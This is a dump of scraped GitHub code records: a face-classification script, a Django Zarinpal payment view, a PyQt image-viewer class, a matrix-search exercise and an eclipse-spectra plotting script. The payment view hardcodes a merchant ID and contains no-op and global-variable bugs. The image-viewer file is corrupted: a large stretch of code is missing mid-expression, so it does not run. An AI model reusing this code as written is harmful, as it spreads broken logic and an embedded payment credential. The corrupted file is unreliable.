rr","repo_name":"influenzanet/python-influenzanet-surveys","sub_path":"influenzanet/surveys/standard/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"8115641093","text":"from __future__ import print_function\nfrom ikrlib import png2fea\nimport numpy as np\nfrom time import time\nfrom sklearn.decomposition import PCA\nfrom sklearn.neural_network import MLPClassifier\n\n\ntrain_persons = []\ntrain_persons_classes = []\nfor number in range(1, 32):\n train_person = png2fea('train/' + str(number) + '/').values()\n train_persons.extend(train_person)\n train_persons_classes.extend([number] *len(train_person))\n #train_persons[number-1] = np.vstack(train_persons[number-1])\n\nfor number in range(1, 32):\n train_person = png2fea('dev/' + str(number) + '/').values()\n train_persons.extend(train_person)\n train_persons_classes.extend([number] *len(train_person))\n #train_persons[number-1] = np.vstack(train_persons[number-1])\n\ntest_persons = []\ntest_filenames = []\ntst = png2fea('eval/')\ntest_filenames.extend(tst.keys())\ntest_person = tst.values()\ntest_persons.extend(test_person)\n#train_persons[number-1] = np.vstack(train_persons[number-1])\n\nw = 80\nh = 80\n\ntrain_persons = np.array(train_persons)\ndim = train_persons.shape[1]\nprint(\"Total dataset size:\")\nprint(\"n_samples: %d\" % len(train_persons))\nprint(\"n_features: %d\" % dim)\nprint(\"n_classes: %d\" % 31)\n\n# #############################################################################\n# Compute a PCA (eigenfaces) on the face dataset (treated as unlabeled\n# dataset): unsupervised feature extraction / dimensionality reduction\nn_components = 64\n\nprint(\"Extracting the top %d eigenfaces from %d faces\"\n % (n_components, train_persons.shape[0]))\nt0 = time()\npca = PCA(n_components=n_components, svd_solver='randomized',\n whiten=True).fit(train_persons)\nprint(\"done in %0.3fs\" % (time() - t0))\n\neigenfaces = pca.components_.reshape((n_components, h, w))\n\nprint(\"Projecting the input data on the eigenfaces orthonormal basis\")\nt0 = time()\ntrain_persons_pca = pca.transform(train_persons)\ntest_persons_pca = pca.transform(test_persons)\nprint(\"done in %0.3fs\" % (time() - t0))\n\n\n# #############################################################################\n# Train a SVM classification model\n\nprint(\"Fitting the classifier to the training set\")\nt0 = time()\nparam_grid = {'C': [1e3, 5e3, 1e4, 5e4, 1e5],\n 'gamma': [0.0001, 0.0005, 0.001, 0.005, 0.01, 0.1], }\n#clf = GridSearchCV(SVC(kernel='rbf', class_weight='balanced',probability=True), param_grid, cv=5)\nclf = MLPClassifier(hidden_layer_sizes=(800,), activation='logistic', learning_rate='adaptive', alpha=1e-4,\n max_iter=1000, random_state=1)\n\n\nclf = clf.fit(train_persons_pca, train_persons_classes)\nprint(\"done in %0.3fs\" % (time() - t0))\nprint(\"Best estimator found by grid search:\")\n#print(clf.best_estimator_)\n\n\n# #############################################################################\n# Quantitative evaluation of the model quality on the test set\n\nprint(\"Predicting people's names on the test set\")\nt0 = time()\n\n#test_classes_Predictions = clf.predict(test_persons_pca)\ntest_classes_Predictions = clf.predict_log_proba(test_persons_pca)\nprint(\"done in %0.3fs\" % (time() - t0))\n\nwith open(\"image_NN\", \"w\") as f:\n for file, probab in zip(test_filenames, test_classes_Predictions):\n file = 
file.split('/')[1][:-4]\n hard_decision = 1 + np.argmax(probab)\n f.write(\"{0} {1} {2}\\n\".format(file, hard_decision, ' '.join([str(x) for x in probab.tolist()])))\n\n","repo_name":"nikopatrik/IKR","sub_path":"image_neural_network.py","file_name":"image_neural_network.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"36353442654","text":"from django.utils import timezone\r\nfrom payment_stripe.models import Payment \r\nfrom django.http import HttpResponse\r\nfrom django.shortcuts import redirect\r\nfrom django.shortcuts import render, get_object_or_404\r\nimport requests\r\nfrom django.urls import reverse_lazy\r\nimport json\r\nfrom django.urls import reverse\r\n\r\nfrom paypal.standard.ipn.signals import valid_ipn_received\r\nfrom django.dispatch import receiver\r\nfrom django.db.models.signals import post_save\r\n\r\nfrom payment_stripe.models import InternationalOrder\r\n\r\nfrom ivc_project.email_sender import send_new_email\r\nfrom ivc_project.settings import EMAIL_HOST_USER\r\nfrom django.core.mail import EmailMultiAlternatives\r\nfrom django.template.loader import render_to_string\r\nfrom accounting.views import invoice_pay\r\n\r\n\r\ndef request_amount(request, pk):\r\n obj_pay = get_object_or_404(Payment, pk=pk)\r\n global amount\r\n if request.method == 'POST':\r\n print('pooooooooooooooooooooost')\r\n print('pooooooooooooooooooooost')\r\n print('pooooooooooooooooooooost')\r\n # amount = 11000 # Rial / Required\r\n amount = obj_pay.total\r\n print(amount)\r\n print(amount)\r\n print(amount)\r\n print(amount)\r\n return redirect(\"zarinpal:request\")\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef send_request(request, pk):\r\n obj_pay = get_object_or_404(Payment, pk=pk)\r\n if obj_pay.total == 0:\r\n obj_pay.user.memberprofile.balance += obj_pay.zarinpal_amount\r\n obj_pay.invoice.is_paid\r\n obj_pay.user.memberprofile.save()\r\n obj_pay.paymented += 1\r\n obj_pay.success_date = timezone.now()\r\n obj_pay.save()\r\n invoice_pay(obj_pay.invoice.id)\r\n return redirect('accounting:invoice-detail', pk=obj_pay.invoice.id)\r\n\r\n MERCHANT = '4e843bef-6b60-4cd0-b85a-ae2d89147c9c'\r\n ZP_API_REQUEST = \"https://api.zarinpal.com/pg/v4/payment/request.json\"\r\n ZP_API_VERIFY = \"https://api.zarinpal.com/pg/v4/payment/verify.json\"\r\n ZP_API_STARTPAY = \"https://www.zarinpal.com/pg/StartPay/{authority}\"\r\n\r\n \r\n amount = obj_pay.total # Rial / Required\r\n description = \"توضیحات مربوط به تراکنش را در این قسمت وارد کنید\" # Required\r\n # email = 'email@example.com' # Optional\r\n # mobile = '09123456789' # Optional\r\n # Important: need to edit for realy server.\r\n\r\n # CallbackURL = 'http://127.0.0.1:8000/verify/'\r\n\r\n CallbackURL = str(reverse('zarinpal:verify', args=[obj_pay.pk]))\r\n CallbackURL = 'http://tecvico.com' + CallbackURL\r\n\r\n\r\n req_data = {\r\n \"merchant_id\": MERCHANT,\r\n \"amount\": amount,\r\n \"callback_url\": CallbackURL,\r\n \"description\": description,\r\n \"metadata\": {\"mobile\": request.user.memberprofile.phone, \"email\": request.user.email}\r\n }\r\n\r\n req_header = {\"accept\": \"application/json\",\r\n \"content-type\": \"application/json'\"}\r\n req = requests.post(url=ZP_API_REQUEST, data=json.dumps(\r\n req_data), headers=req_header)\r\n \r\n authority = req.json()['data']['authority']\r\n if len(req.json()['errors']) == 0:\r\n obj_pay.merchant=MERCHANT\r\n obj_pay.save()\r\n return redirect(ZP_API_STARTPAY.format(authority=authority))\r\n 
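# NOTE (added comment): a non-empty 'errors' object means Zarinpal rejected the request; its code and message are surfaced below.\r\n    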
else:\r\n e_code = req.json()['errors']['code']\r\n e_message = req.json()['errors']['message']\r\n return HttpResponse(f\"Error code: {e_code}, Error Message: {e_message}\")\r\n \r\n\r\n\r\ndef verify(request, pk):\r\n obj_pay = get_object_or_404(Payment, pk=pk)\r\n payment_url = obj_pay.back_url\r\n\r\n t_status = request.GET.get('Status')\r\n t_authority = request.GET['Authority']\r\n if request.GET.get('Status') == 'OK':\r\n req_header = {\"accept\": \"application/json\",\r\n \"content-type\": \"application/json'\"}\r\n req_data = {\r\n \"merchant_id\": '4e843bef-6b60-4cd0-b85a-ae2d89147c9c',\r\n \"amount\": obj_pay.total,\r\n \"authority\": t_authority\r\n }\r\n req = requests.post(url=\"https://api.zarinpal.com/pg/v4/payment/verify.json\", data=json.dumps(req_data), headers=req_header)\r\n if len(req.json()['errors']) == 0:\r\n t_status = req.json()['data']['code']\r\n if t_status == 100:\r\n\r\n obj_pay.invoice.is_paid\r\n obj_pay.paymented += 1\r\n obj_pay.success_date = timezone.now()\r\n obj_pay.merchant=\"4e843bef-6b60-4cd0-b85a-ae2d89147c9c\"\r\n obj_pay.save()\r\n\r\n context = {\r\n 'invoice': obj_pay,\r\n 'RefID': str(req.json()['data']['ref_id']),\r\n 'payment_url':payment_url\r\n }\r\n\r\n context_email = {\r\n 'obj_pay': obj_pay,\r\n 'RefID': str(req.json()['data']['ref_id'])\r\n }\r\n html_body = render_to_string(\"payment_stripe/inv-email.html\", context_email)\r\n e_subject = \"TECVICO\"\r\n #e_content = \"Dear {user}\\nHi\\nHope you are going well.\\nYou paid {cost} at {date}\\n{intent} \\nDo not reply to this Email. If you have any questions or concerns, please feel free to contact the company:\\nEmail: payment@tecvico.com\\n\\nThank you.\\n\\nBest regards\\n\\n\".format(user = instance.user, cost = instance.purchased_amount, date = instance.date_created, intent = instance.payment_intent)\r\n e_content = \"\"\r\n e_destination = obj_pay.user.email\r\n msg = EmailMultiAlternatives(subject=e_subject, from_email=EMAIL_HOST_USER,to=[e_destination], body=e_content)\r\n msg.attach_alternative(html_body, \"text/html\")\r\n msg.send()\r\n\r\n invoice_pay(obj_pay.invoice.id)\r\n return redirect('accounting:invoice-detail', pk=obj_pay.invoice.id)\r\n\r\n\r\n return render(request, 'payment_stripe/inv.html', context)\r\n\r\n elif t_status == 101:\r\n return HttpResponse('Transaction submitted : ' + str(\r\n req.json()['data']['message']\r\n ))\r\n else:\r\n return HttpResponse('Transaction failed.\\nStatus: ' + str(\r\n req.json()['data']['message']\r\n ))\r\n else:\r\n e_code = req.json()['errors']['code']\r\n e_message = req.json()['errors']['message']\r\n return HttpResponse(f\"Error code: {e_code}, Error Message: {e_message}\")\r\n else:\r\n return HttpResponse('Transaction failed or canceled by user')\r\n\r\n# def success(request, pk)","repo_name":"MohamadAhmadi100/vollabor-django-plattform","sub_path":"be/zarinpal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"70319952301","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 26 16:10:00 2014\n\n@author: Kyle Ellefsen\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function, unicode_literals)\nfrom future.builtins import (bytes, dict, int, list, object, range, str, ascii, chr, hex, input, next, oct, open, pow, round, super, filter, map, zip)\n\nfrom PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import pyqtSignal as Signal\nimport pyqtgraph 
as pg\npg.setConfigOptions(useWeave=False)\nimport os, time\nimport numpy as np\nimport global_vars as g\nfrom roi import *\n\nclass Window(QWidget):\n closeSignal=Signal()\n keyPressSignal=Signal(QEvent)\n deleteButtonSignal=Signal()\n sigTimeChanged=Signal(int)\n def __init__(self,tif,name='',filename='',commands=[],metadata=dict()):\n QWidget.__init__(self)\n self.commands=commands #commands is a list of the commands used to create this window, starting with loading the file\n self.metadata=metadata\n self.image=tif\n\n width=684\n height=585\n x=10+10\n y=484+10\n \n self.name=name\n self.filename=filename\n self.setAsCurrentWindow()\n self.setWindowTitle(os.path.basename(name))\n self.imageview=pg.ImageView(self)\n self.imageview.setMouseTracking(True)\n self.imageview.installEventFilter(self)\n #self.imageview.ui.normBtn.setParent(None) # gets rid of 'norm' button that comes with ImageView\n self.imageview.ui.roiBtn.setParent(None) # gets rid of 'roi' button that comes with ImageView\n self.imageview.setImage(tif)\n \"\"\" Here we set the initial range of the look up table. \"\"\"\n nDims=len(np.shape(self.image))\n if nDims==3:\n mt,mx,my=tif.shape\n if np.min(self.image)==0 and (np.max(self.image)==0 or np.max(self.image)==1): #if the image is binary (either all 0s or 0s and 1s)\n self.imageview.setLevels(-.01,1.01) #set levels from slightly below 0 to 1\n elif np.all(self.image[0]==0): #if the first frame is all zeros\n r=(np.min(self.image),np.max(self.image)) #set the levels to be just above and below the min and max of the entire tif\n r=(r[0]-(r[1]-r[0])/100,r[1]+(r[1]-r[0])/100)\n self.imageview.setLevels(r[0],r[1])\n else: \n r=(np.min(self.image[0]),np.max(self.image[0])) #set the levels to be just above and below the min and max of the first frame\n r=(r[0]-(r[1]-r[0])/100,r[1]+(r[1]-r[0])/100)\n self.imageview.setLevels(r[0],r[1])\n elif nDims==4:\n mt,mx,my,mc=tif.shape\n if np.min(self.image)==0 and (np.max(self.image)==0 or np.max(self.image)==1): #if the image is binary (either all 0s or 0s and 1s)\n self.imageview.setLevels(-.01,1.01) #set levels from slightly below 0 to 1\n elif nDims==2:\n mt=1\n mx,my=tif.shape\n self.mx=mx; self.my=my; self.mt=mt\n self.imageview.timeLine.sigPositionChanged.connect(self.updateindex)\n self.currentIndex=self.imageview.currentIndex\n self.layout = QVBoxLayout(self)\n self.layout.addWidget(self.imageview)\n self.layout.setContentsMargins(0,0,0,0)\n self.setGeometry(QRect(x, y, width, height))\n self.imageview.scene.sigMouseMoved.connect(self.mouseMoved)\n self.imageview.view.mouseDragEvent=self.mouseDragEvent\n self.imageview.view.mouseClickEvent=self.mouseClickEvent\n self.rois=[]\n self.currentROI=None\n self.currentROIs={}\n self.creatingROI=False\n self.scatterPlot=pg.ScatterPlotItem(size=5, pen=pg.mkPen([0,0,0,255]), brush=pg.mkBrush(255, 0, 0, 255)) #this is the plot that all the red points will be drawn on\n self.scatterPoints=[[] for _ in np.arange(mt)]\n self.scatterPlot.sigClicked.connect(self.clickedScatter)\n self.imageview.addItem(self.scatterPlot)\n self.pasteAct = QAction(\"&Paste\", self, triggered=self.paste)\n self.sigTimeChanged.connect(self.showFrame)\n \n self.closed=False\n self.show()\n \n def updateindex(self):\n (idx, t) = self.imageview.timeIndex(self.imageview.timeLine)\n t=int(np.ceil(t))\n self.currentIndex = t\n self.scatterPlot.setPoints(pos=self.scatterPoints[t])\n self.sigTimeChanged.emit(t)\n\n def setIndex(self,index):\n if index>=0 and index=image.shape[0] or self.y>=image.shape[1]:\n pass# if we 
are outside the image\n        else:\n            z=self.imageview.currentIndex\n            value=image[int(self.x),int(self.y)]\n            g.m.statusBar().showMessage('x={}, y={}, z={}, value={}'.format(int(self.x),int(self.y),z,value))\n            for roi in self.rois:\n                roi.mouseOver(self.x,self.y)\n                if self.creatingROI is False:\n                    if roi.contains(self.x,self.y):\n                        self.currentROI=roi\n\n    def mouseDragEvent(self, ev):\n        modifiers = QApplication.keyboardModifiers()\n        if modifiers == Qt.ShiftModifier:\n            pass #This is how I detect that the shift key is held down.\n        if ev.button() == Qt.LeftButton:\n            ev.accept()\n            difference=self.imageview.getImageItem().mapFromScene(ev.lastScenePos())-self.imageview.getImageItem().mapFromScene(ev.scenePos())\n            self.imageview.view.translateBy(difference)\n        if ev.button() == Qt.RightButton:\n            ev.accept()\n            if ev.isStart():\n                self.ev=ev\n                pt=self.imageview.getImageItem().mapFromScene(ev.buttonDownScenePos())\n                self.x=pt.x() # this sets x and y to the button down position, not the current position\n                self.y=pt.y()\n                #print(\"Drag start x={},y={}\".format(self.x,self.y))\n                for roi in self.rois:\n                    roi.mouseOver(self.x,self.y)\n                if any([r.mouseIsOver for r in self.rois]): #if any roi is moused over\n                    self.currentROIs=[r for r in self.rois if r.mouseIsOver]\n                    self.creatingROI=False\n                else:\n                    self.creatingROI=True\n                    self.currentROI=ROI(self,self.x,self.y)\n            if ev.isFinish():\n                if self.creatingROI:\n                    self.currentROI.drawFinished()\n                    self.creatingROI=False\n                else: \n                    for r in self.currentROIs:\n                        r.finish_translate()\n            else: # if we are in the middle of the drag between starting and finishing\n                #if inImage:\n                if self.creatingROI:\n                    self.currentROI.extend(self.x,self.y)\n                else:\n                    difference=self.imageview.getImageItem().mapFromScene(ev.scenePos())-self.imageview.getImageItem().mapFromScene(ev.lastScenePos())\n                    if difference.isNull():\n                        return\n                    for r in self.currentROIs:\n                        r.translate(difference,self.imageview.getImageItem().mapFromScene(ev.lastScenePos()))\n\n    def updateTimeStampLabel(self,frame):\n        label=self.timeStampLabel\n        if self.framerate==0:\n            label.setHtml(\"Frame rate is 0 Hz\" )\n            return\n        time=frame/self.framerate\n        if time<1:\n            time=time*1000\n            label.setHtml(\"{:.0f} ms\".format(time))\n        elif time<60:\n            label.setHtml(\"{:.3f} s\".format(time))\n        elif time<3600:\n            minutes=int(np.floor(time/60))\n            seconds=time % 60\n            label.setHtml(\"{}m {:.3f} s\".format(minutes,seconds))\n        else:\n            hours=int(np.floor(time/3600))\n            mminutes=time-hours*3600\n            minutes=int(np.floor(mminutes/60))\n            seconds=mminutes-minutes*60\n            label.setHtml(\"{}h {}m {:.3f} s\".format(hours,minutes,seconds))\n","repo_name":"BrettJSettle/MotilityTracking","sub_path":"window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":11464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"}
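The `updateTimeStampLabel` method in the window.py record above buckets an elapsed time into ms/s/m/h by hand with `np.floor`. A standalone equivalent built on `divmod`, assuming only a frame index and a frame rate in Hz; the helper name is hypothetical, not part of the original class:

    def format_timestamp(frame, framerate):
        # Guard the zero-rate case up front instead of dividing by zero.
        if framerate == 0:
            return "Frame rate is 0 Hz"
        seconds = frame / framerate
        if seconds < 1:
            return "{:.0f} ms".format(seconds * 1000)
        minutes, secs = divmod(seconds, 60)        # whole minutes, leftover seconds
        hours, minutes = divmod(int(minutes), 60)  # whole hours, leftover minutes
        if hours:
            return "{}h {}m {:.3f} s".format(hours, minutes, secs)
        if minutes:
            return "{}m {:.3f} s".format(minutes, secs)
        return "{:.3f} s".format(secs)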
+{"seq_id":"70667804779","text":"\"\"\"\n5- Read a 5x5 matrix. Also read a value X. The program should search\nfor this value in the matrix and, at the end, print its location\n(row and column) or a 'not found' message.\n\"\"\"\n\nmatriz = [[], [], [], [], []]\npos_de_x = []\n\nprint('Fill in the matrix:')\nfor i in range(5):\n    for j in range(5):\n        matriz[i].append((int(input(f'M[{i},{j}] = '))))\n\nvalor_x = int(input('\\nEnter the value X: '))\n\nfor i in range(5):\n    for j in range(5):\n        if matriz[i][j] == valor_x:\n            pos_de_x.append(str(f'M[{i},{j}]'))\n\nif len(pos_de_x) > 0:\n    print(f'\\nPositions where X = {valor_x} was found: ')\n    for i in pos_de_x:\n        print(i)\nelse:\n    print(f'X = {valor_x} not found.')\n","repo_name":"Fulvio7/curso-python-guppe","sub_path":"guppe/exercicios_secao_7/pt_2/ex_5.py","file_name":"ex_5.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"71675049579","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom astropy.io import fits\nfrom glob import glob\nimport os\nfrom astropy.visualization import ZScaleInterval, ImageNormalize, LogStretch, AsymmetricPercentileInterval\nimport h5py \nfrom astropy.nddata import CCDData\nfrom PIL import Image\nfrom datetime import datetime, timedelta\nfrom ccdproc import ImageFileCollection\nimport pandas as pd\nfrom mpl_toolkits.axes_grid1.inset_locator import inset_axes\nfrom matplotlib.ticker import AutoLocator, AutoMinorLocator, FixedLocator, FixedFormatter, LogLocator, StrMethodFormatter\nfrom matplotlib import patches\nfrom matplotlib.markers import MarkerStyle\nimport cmcrameri.cm as cmcm\nimport cmasher as cmr\nfrom scipy import ndimage\nimport copy\n\nvideo_frame_fnames = sorted(glob(\"../../sav/Eclipse/Video/frame*.jpg\"))\nvideo_frame_fnames = video_frame_fnames[34:200]\n\nvideo_frame_cube = np.zeros((1080,1920,3,200-34),dtype=\"uint8\")\nfor ii, video_frame_fname in enumerate(video_frame_fnames):\n    with Image.open(video_frame_fname) as im:\n        video_frame_cube[:,:,:,ii] = np.asarray(im)\n\nvideo_vertical_slice = slice(390,710)\nvideo_horizontal_slice = slice(746,1160)\nvideo_frame_cube = video_frame_cube[video_vertical_slice,video_horizontal_slice,:,:]\n\nvideo_time_array = np.arange(datetime(2017,8,21,17,45,23),datetime(2017,8,21,17,48,9),timedelta(seconds=1)).astype(datetime)\nvideo_time_array = video_time_array[13:97]\n\nslit_pos = 209.4\nrotate_angle_context = -28.\nsun_center_pixel_plot = np.array([300,220])\n\nwith h5py.File(\"../../sav/Eclipse/LimbTrack/sun_pos_linear_fit.h5\", 'r') as hf:\n    sun_x_fitparam = hf['sun_x_fitparam'][:]\n    sun_y_fitparam = hf['sun_y_fitparam'][:]\n\nsun_x_fitpoly = np.poly1d(sun_x_fitparam)\nsun_y_fitpoly = np.poly1d(sun_y_fitparam)\n\ngreen_path = \"../../src/EclipseSpectra2017/MikesData_l1/Green/\"\nred_path = \"../../src/EclipseSpectra2017/MikesData_l1/Red/\"\n\ntotality_green_im_collection = ImageFileCollection(green_path,\n                        glob_include=\"TotalitySequence*.fit\")\ntotality_green_df = totality_green_im_collection.summary.to_pandas()\ntotality_green_df[\"date-obs\"] = pd.to_datetime(totality_green_df[\"date-obs\"])\n\ntotality_red_im_collection = ImageFileCollection(red_path,\n                        glob_include=\"TotalitySequence*.fit\")\ntotality_red_df = totality_red_im_collection.summary.to_pandas()\ntotality_red_df[\"date-obs\"] = pd.to_datetime(totality_red_df[\"date-obs\"])\n\nFeXI_line_cont_frame = CCDData.read(\"../../src/EclipseSpectra2017/MitchellData/MitchellFeXILine_ContRatio.fits\",unit=\"adu\")\nFeXI_line_cont_image = 
FeXI_line_cont_frame.data\nsun_center_FeXI = (np.float64(FeXI_line_cont_frame.header[\"SUNX\"]),np.float64(FeXI_line_cont_frame.header[\"SUNY\"]))\nFeXI_line_cont_xslice = slice(372-300,372+301)\nFeXI_line_cont_yslice = slice(383-220,383+221)\nFeXI_line_cont_cutout = FeXI_line_cont_image[FeXI_line_cont_yslice, FeXI_line_cont_xslice]\nFeXI_rotate_center = (sun_center_FeXI[0] - FeXI_line_cont_xslice.start, sun_center_FeXI[1] - FeXI_line_cont_yslice.start)\nFeXI_line_cont_image_rot_scipy = ndimage.rotate(FeXI_line_cont_cutout, angle=360 - np.float64(FeXI_line_cont_frame.header[\"SUNROT\"]),reshape=False,order=1)\n\n\nFeXIV_line_cont_frame = CCDData.read(\"../../src/EclipseSpectra2017/MitchellData/MitchellFeXIVLine_ContRatio.fits\",unit=\"adu\")\nFeXIV_line_cont_image = FeXIV_line_cont_frame.data\nsun_center_FeXIV = (np.float64(FeXIV_line_cont_frame.header[\"SUNX\"]),np.float64(FeXIV_line_cont_frame.header[\"SUNY\"]))\nFeXIV_line_cont_xslice = slice(372-300,372+301)\nFeXIV_line_cont_yslice = slice(383-220,383+221)\nFeXIV_line_cont_cutout = FeXIV_line_cont_image[FeXIV_line_cont_yslice, FeXIV_line_cont_xslice]\nFeXIV_rotate_center = (sun_center_FeXIV[0] - FeXIV_line_cont_xslice.start, sun_center_FeXIV[1] - FeXIV_line_cont_yslice.start)\nFeXIV_line_cont_image_rot_scipy = ndimage.rotate(FeXIV_line_cont_cutout, angle=360 - np.float64(FeXIV_line_cont_frame.header[\"SUNROT\"]),reshape=False,order=1)\n\nrsun_arcsec = 950.0\nrsun_context_pixel = 71.4\npixel_ratio = rsun_context_pixel/np.float64(FeXI_line_cont_frame.header[\"MOONR\"])\nimg_pixel_to_arcsec = np.float64(FeXI_line_cont_frame.header[\"SUNR\"])/rsun_arcsec\npixel_ratio_to_arcsec = rsun_context_pixel/np.float64(FeXI_line_cont_frame.header[\"MOONR\"])*img_pixel_to_arcsec\n\ngs_kw = dict(width_ratios=[1,2.2],hspace=0.05)\n\neis_eqs_xcen, eis_eqs_ycen = np.array((-895.061, 390.811))\neis_eqs_fovx, eis_eqs_fovy = np.array((119.808, 160.0))\neis_eqs_xstart = eis_eqs_xcen - eis_eqs_fovx/2.\neis_eqs_xend = eis_eqs_xcen + eis_eqs_fovx/2.\neis_eqs_ystart = eis_eqs_ycen - eis_eqs_fovy/2.\neis_eqs_yend = eis_eqs_ycen + eis_eqs_fovy/2.\n\neis_spch_fovx, eis_spch_fovy = np.array((60.,512.))\neis_spch_xstart = -15.\neis_spch_xend = 45.\neis_spch_ystart = -1358.5\neis_spch_yend = -855.\n\ndef create_rec_eqs():\n return patches.Rectangle((eis_eqs_xstart, eis_eqs_ystart),\n eis_eqs_fovx, eis_eqs_fovy,linewidth=0,edgecolor=\"grey\",\n facecolor=\"grey\",alpha=0.6)\ndef create_rec_spch():\n return patches.Rectangle((eis_spch_xstart, eis_spch_ystart),\n eis_spch_fovx, eis_spch_fovy,linewidth=0,edgecolor=\"grey\",\n facecolor=\"grey\",alpha=0.6)\n\n\nimg_center = np.array([300,220])\nimg_xpixel_array = np.arange(FeXIV_line_cont_image_rot_scipy.shape[1])\nimg_ypixel_array = np.arange(FeXIV_line_cont_image_rot_scipy.shape[0])\n\ndef func_img_xpixel_to_xarcsec(x):\n return (x - img_center[0])/img_pixel_to_arcsec\n\ndef func_img_xarcsec_to_xpixel(x):\n return x*img_pixel_to_arcsec + img_center[0]\n\ndef func_img_ypixel_to_yarcsec(x):\n return (x - img_center[1])/img_pixel_to_arcsec\n\ndef func_img_yarcsec_to_ypixel(x):\n return x*img_pixel_to_arcsec + img_center[1]\ndef func_one_to_one(x):\n return x\n\nimg_xarcsec_array = func_img_xpixel_to_xarcsec(img_xpixel_array)\nimg_yarcsec_array = func_img_ypixel_to_yarcsec(img_ypixel_array)\n\nfor ii, ii_time in enumerate(video_time_array[:]):\n fig, axes = plt.subplots(2,2,figsize=(16,9),gridspec_kw=gs_kw,constrained_layout=True)\n ((ax_img, ax_specg),(ax_imr, ax_specr)) = axes\n\n 
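The plotting loop here wires pixel read-outs onto the arcsec axes a few lines below via `secondary_xaxis`/`secondary_yaxis`, each of which takes a (forward, inverse) pair of mapping functions so the two scales stay in sync. A stripped-down sketch of that pattern; the linear calibration constants `CENTER_PX` and `PX_PER_ARCSEC` are invented placeholders, not the script's real values:

    import matplotlib.pyplot as plt
    import numpy as np

    CENTER_PX, PX_PER_ARCSEC = 300.0, 0.25  # invented calibration

    def xpixel_to_xarcsec(x):
        return (x - CENTER_PX) / PX_PER_ARCSEC

    def xarcsec_to_xpixel(x):
        return x * PX_PER_ARCSEC + CENTER_PX

    fig, ax = plt.subplots()
    ax.plot(np.arange(600), np.random.rand(600))
    ax.set_xlabel("Solar-X [pixel]")
    # secondary_xaxis needs the two functions to be exact inverses of
    # each other, otherwise the tick positions drift apart.
    secax = ax.secondary_xaxis("top", functions=(xpixel_to_xarcsec, xarcsec_to_xpixel))
    secax.set_xlabel("Solar-X [arcsec]")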
ax_img.pcolormesh(img_xarcsec_array,img_yarcsec_array,FeXIV_line_cont_image_rot_scipy,vmin=0.2,vmax=1.2,\n cmap=cmr.jungle_r,shading=\"auto\",rasterized=True)\n ax_imr.pcolormesh(img_xarcsec_array,img_yarcsec_array,FeXI_line_cont_image_rot_scipy,vmin=1,vmax=4,\n cmap=cmcm.lajolla,shading=\"auto\",rasterized=True)\n\n \n ax_img.add_patch(create_rec_eqs())\n ax_imr.add_patch(create_rec_eqs())\n ax_img.add_patch(create_rec_spch())\n ax_imr.add_patch(create_rec_spch())\n\n ax_img.set_title(\"Fe XIV 530.3 nm {}\".format(ii_time.strftime(\"%H:%M:%S\")),fontsize=14)\n ax_imr.set_title(\"Fe XI 789.2 nm {}\".format(ii_time.strftime(\"%H:%M:%S\")),fontsize=14)\n \n ax_img_xpixel = ax_img.secondary_xaxis(\"top\",functions=(func_img_xarcsec_to_xpixel,func_img_xpixel_to_xarcsec))\n ax_img_ypixel = ax_img.secondary_yaxis(\"right\",functions=(func_img_yarcsec_to_ypixel,func_img_ypixel_to_yarcsec))\n\n ax_imr_xpixel = ax_imr.secondary_xaxis(\"top\",functions=(func_img_xarcsec_to_xpixel,func_img_xpixel_to_xarcsec))\n ax_imr_ypixel = ax_imr.secondary_yaxis(\"right\",functions=(func_img_yarcsec_to_ypixel,func_img_ypixel_to_yarcsec))\n\n for ax_ in (ax_img_xpixel,ax_img_ypixel,ax_imr_xpixel,ax_imr_ypixel):\n ax_.tick_params(labelsize=12)\n\n ax_img.set_ylabel(\"Solar-Y [arcsec]\",fontsize=14)\n ax_imr.set_xlabel(\"Solar-X [arcsec]\",fontsize=14)\n ax_imr.set_ylabel(\"Solar-Y [arcsec]\",fontsize=14)\n\n\n\n if ii < 5:\n slit_xshift = sun_x_fitpoly(5) - slit_pos\n else:\n slit_xshift = sun_x_fitpoly(ii) - slit_pos\n\n slit_center_x = - slit_xshift/pixel_ratio_to_arcsec*np.cos(np.deg2rad(np.abs(rotate_angle_context)))\n slit_center_y = slit_xshift/pixel_ratio_to_arcsec*np.sin(np.deg2rad(np.abs(rotate_angle_context)))\n\n slit_top_x = slit_center_x + rsun_arcsec*np.sin(np.deg2rad(np.abs(rotate_angle_context)))\n slit_top_y = slit_center_y + rsun_arcsec*np.cos(np.deg2rad(np.abs(rotate_angle_context)))\n\n slit_bottom_x = 2*slit_center_x - slit_top_x\n slit_bottom_y = 2*slit_center_y - slit_top_y\n\n slit_limb_marker = MarkerStyle(\"_\")\n slit_limb_marker._transform.rotate_deg(-30)\n\n ax_img.scatter([slit_bottom_x, slit_top_x],[slit_bottom_y, slit_top_y],s=20,marker=slit_limb_marker,color=\"red\",alpha=0.8)\n ax_imr.scatter([slit_bottom_x, slit_top_x],[slit_bottom_y, slit_top_y],s=20,marker=slit_limb_marker,color=\"red\",alpha=0.8)\n\n\n ax_img.axline((slit_center_x,slit_center_y),slope=1/np.tan(np.deg2rad(np.abs(rotate_angle_context))),color=\"red\",lw=2,alpha=0.8)\n ax_imr.axline((slit_center_x,slit_center_y),slope=1/np.tan(np.deg2rad(np.abs(rotate_angle_context))),color=\"red\",lw=2,alpha=0.8)\n\n\n green_nearest_fname = totality_green_df.loc[(totality_green_df['date-obs'] \n - video_time_array[ii]).abs().idxmin(),\"file\"]\n red_nearest_fname = totality_red_df.loc[(totality_red_df['date-obs'] \n - video_time_array[ii]).abs().idxmin(),\"file\"]\n\n green_frame = 